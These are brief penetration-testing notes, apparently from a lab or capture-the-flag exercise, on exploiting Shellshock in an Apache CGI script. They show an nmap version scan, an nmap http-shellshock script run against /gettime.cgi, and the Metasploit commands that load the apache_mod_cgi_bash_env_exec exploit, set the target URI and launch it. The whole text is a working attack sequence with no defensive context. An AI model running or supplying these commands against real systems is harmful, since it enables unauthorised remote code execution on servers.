80/tcp open http Apache httpd 2.4.6 ((Unix))
nmap -sV --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.173
search shellshock
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS ip address
set TARGETURI /gettime.cgi
exploit